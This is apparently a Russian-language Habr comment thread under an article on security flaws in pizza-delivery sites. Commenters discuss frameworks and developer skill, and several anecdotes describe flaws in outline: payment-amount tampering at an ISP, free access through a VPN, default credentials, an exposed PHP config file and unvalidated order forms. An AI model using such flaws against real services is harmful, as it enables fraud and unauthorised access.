    25.03.2017 13:44
    -3

    Это ж всё последствия засилья фреймворков, как кому бы не хотелось доказать обратное…
    Фреймворк создан и удобен для быстрой разработки конечного продукта, т.к. нет необходимости писать очередной велосипед.
    Но именно фреймворки рождают в нас ту самую лень и поверхностное знание продукта. Помножим это всё на тот факт, что далеко не всегда начинающие проект заканчивают его (т.е. заканчивают совсем другие люди), и получаются в продакшне дыра на дыре.

    Классическая палка о двух концах, короче говоря.


    1. riky
      25.03.2017 15:12

      вы видимо видели мало говнокода без фреймворков? там зачастую одни сплошные sql-inj, xss а уж xsrf сам бог велел. (фреймворки же от этих вещей почти всегда спасают)
      то что человек поленился фреймворк изучить, не значит что он потратит это время на изучение безопасности.
      то что вы описали — общее последствие низкого порога входа. вчера человек hello world написал, а сегодня уже сайт пиццы делает, и как правило до фреймворков ему еще далеко (совсем не факт что эти пиццы на фреймворке были, скорее даже наоборот).


      1. rockin
        25.03.2017 15:53

        Всё дело тут в том, что как раз фреймворк и предполагает низкий уровень входа.

        Я же не писал о том, что _все_, кто использует фреймворки, нубы и вообще ни о чём. Как раз нет — профи, изучивший фреймворк(и) намного быстрее реализует поставленные задачи, но… фреймворк предполагает, что им не только профи будут пользоваться, но и вчерашние школьники. Уже нет смысла школьнику начинать с «хелоу, ворлд», фреймворк за него формочки отрисует и по дефолту нечто представит. Дальше же остаётся по верхам пробежать по документации, выделить что-то для себя важное и, вуаля.
        Бизнес же часто смотрит только на финансовую сторону вопроса, ему глубоко наплевать, что там на выходе будет, лишь бы было, да побыстрее.
        Отсюда далеко не всегда в продакшн выпускают проекты профессионалы своего дела. Отсюда и смешные дыры, что автор статьи нашёл.

        ***
        Другими словами, не будь сейчас такого количества удобных инструментов, тот, кому рановато ещё, так бы ничего и не написал. Плохо это или хорошо? Да хз, палка-то о двух концах.


        1. DjOnline
          25.03.2017 16:43
          +2

          Я думаю проблема ещё и в том, что многие современные разработчики не являются хакерами в хорошем смысле этого слова, не выросли на журнале Хакер, и понятия не имеют о возможных векторах атаки и способах защиты от них. Разработчик должен был за свою жизнь побывать с двух сторон от баррикад, чтобы разбираться в этом.


    1. rockin
      26.03.2017 15:53

      Хабр — это сообщество анонимных лохов.

      Влепил шпалу и побежал дальше, зачем комментировать? Не надо комментировать, просто влепи шпалу и беги дальше ;)


  1. TimsTims
    25.03.2017 19:12
    +1

    Пиццу редко когда заказываю, в последний раз кажется полгода назад. А после прочтения вашей статьи, хабр мне начал рекламировать пиццу. Хммм

    Заголовок спойлера
    Ну ок, не Хабр, а тот-кто-всё-знает и следит за мной на хабре. Пора доставать шапочку из фольги.



    1. dimaaan
      25.03.2017 20:46
      +1

      Просто в вашем браузере не хватает определенного плагина


  1. awakewithadawn
    25.03.2017 23:36
    +1

    А что такое "открытый php-файл"?


    1. w9w
      25.03.2017 23:36

      Это файл, который можно скачать или просмотреть.


  1. DIHALT
    26.03.2017 07:42
    +1

    А я поступал проще. У Додо есть условие по которому если они не доставили за час, то пицца на халяву. А у меня в определённые часы моя улица наглухо блокируется в пробке. То есть выбрав верное время гарантированно получаешь срыв срока. И сертификат на халяву за опоздание.


    1. Stalker_RED
      27.03.2017 20:28

      На мопедах еще не развозят?


      1. DIHALT
        27.03.2017 22:03
        +1

        У нас тут не Калифорния. 7 месяцев холодина, остальные месяцы грязища. Какой, нахрен, мопед?


        1. Stalker_RED
          28.03.2017 07:34
          +2

          У нас тут в Киеве тоже не Калифорния, но несколько пиццерий развозят на мопедах и даже велосипедах. Возможно, что не круглый год.


          1. w9w
            28.03.2017 14:35

            В Одессе иногда пешком ходят из термосумкой)


          1. DIHALT
            28.03.2017 18:30
            +1

            У вас все равно несравнимо теплей.


  1. OKyJIucT
    26.03.2017 14:01
    +1

    Пару месяцев назад нашел уязвимость с оплатой у своего интернет провайдера. Он не проверял сумму фактического пополнения, а только проверял сам факт пополнения баланса, и сумму можно было менять произвольно.
    Наделал скринов, пошагово описал, что как делал, отправил. Две недели прошло — никакой реакции. Начал писать в чаты, на другие почты — позвонили оттуда, сказали что письмо не получили, поскольку, оказывается, что официальный email, указаны на сайте, не работает, и надо было слать информацию на другой, которого даже на сайте нет.
    В итоге сняли все деньги, которые я получил с использованием уязвимости, и сняли еще непонятно почему сверху (как оказалось потом — они просто неверно перестали баланс однажды).
    Ни о каких бонусах и подарках речи не шло. Даже спасибо никто не сказал (пусть даже и в ответном письме), но уязвимость таки благополучно закрыли.
    Провайдер Фрегат, работает в Киеве, Днепре и некоторых других городах Украины.


    1. w9w
      26.03.2017 14:03

      Похожую уязвимость обнаружил в одесского провайдера «Соборка», если у тебя нет денег на счету и ты заходишь через vpn, то можно сидеть в интернете бесплатно.


    1. romanegunkov
      27.03.2017 19:07
      +1

      Для провайдера, жесть конечно. Видимо используют security bug tracker, например pastebin, для приёма таких репортов.


  1. Nihau
    26.03.2017 14:01
    +1

    user=root&password=password

    А вы про безопасность


    1. w9w
      26.03.2017 14:06

      На самом деле там был другой логин и пароль в виде логин; логин123, но такой же сложности, как Вы описали)


  1. Libert
    27.03.2017 09:50
    +1

    >Как бонус вот такая фича пентестерам: когда необходимо протестировать уязвимость на сайте на двух аккаунтах, и ваша почта находится в Яндексе, то на одну почту можно зарегистрировать два аккаунта (mail@yandex.ru; mail@ya.ru).
    Ещё mail@yandex.com,mail@yandex.by, mail@yandex.kz, mail@yandex.ua и mail@narod.ru


  1. nikitasius
    27.03.2017 10:38
    +1

    В европе платят за нахождение уязвимостей. Недавно нашел такую у OVH, в итоге получил «коммерческий подарок», которые мне обеспечвает почти 5 месяцев хостинга у них.


    1. w9w
      27.03.2017 13:30
      +1

      У нас тоже, недавно проверял популярные украинские интернет магазины, оказывается, в одной компании есть bug bounty(баллы), но не официальная, прислал несколько багов, получил приличную сумму на бонусную карту для покупки техники.


    1. pyrk2142
      27.03.2017 15:25
      +1

      Нет везде в Европе платят, увы. Находил уязвимость, которая позволяла получить доступ к данным всех клиентов, ответили только «Thanks» (это полное ответное письмо).


      1. romanegunkov
        27.03.2017 18:26
        +1

        Можно считать поучаствовали в Bugs Bounty Program.


  1. Itachi261092
    28.03.2017 11:31
    +2

    Дефолтные пароли? Защита? пффф… У меня есть клиент, который сам просит ставить пользователям дефолтные пароли из 6 цифр. при этом для авторизации отключена капча, а в качестве логина используется номер мобильника. при любом заказе номер сотового вводить обязательно. и на сайте создаётся учётка с этим телефоном и 6циферным паролем, а также после заказа остаются фио и личный адрес пользователя, которые он указал для доставки. на любые доводы, что это всё не безопасно — клиент всё игнорит. «главное, говорит, чтобы пользователям удобно было — ввёл номер телефона, и всё. а пароль циферный в смске приходит» чем дольше с ним работаю — тем больше он придумывает «фич» которые понемногу гробят его сайт…


  1. Itachi261092
    28.03.2017 11:33
    +1

    А ещё как то работал с готовым сайтом доставки пиццы — там поля формы вообще никак не проверяются. можно и сумму меньше отправить и в поля что угодно вписать. но операторы обрабатывают заказы вручную и не принимают с нарушениями. я предложил исправить форму — сказали не надо. и так типа сойдёт.


  1. 14types
    28.03.2017 19:51
    +2

    Можно подробнее про «открытый» php-файл? То есть на сервере лежал *.php файл и его можно было скачать? Каким образом?


    1. w9w
      28.03.2017 19:53

      Да. Был открыт файл /access.php, его можно было скачать в обычном браузере и просмотреть чувствительные данные, указанные в статье.


      1. 14types
        29.03.2017 00:02

        Кто-нибудь, объясните, пожалуйста, что значит «файл открыт»?


        1. MikailBag
          29.03.2017 18:43
          +1

          Он отдавался сервером как текстовый (без интерпретации)


    1. w9w
      28.03.2017 19:54

      Теперь поставили права на файл в .htaccess


  1. NeuroZ
    29.03.2017 18:19

    «Как мобидел остался не у дел» :))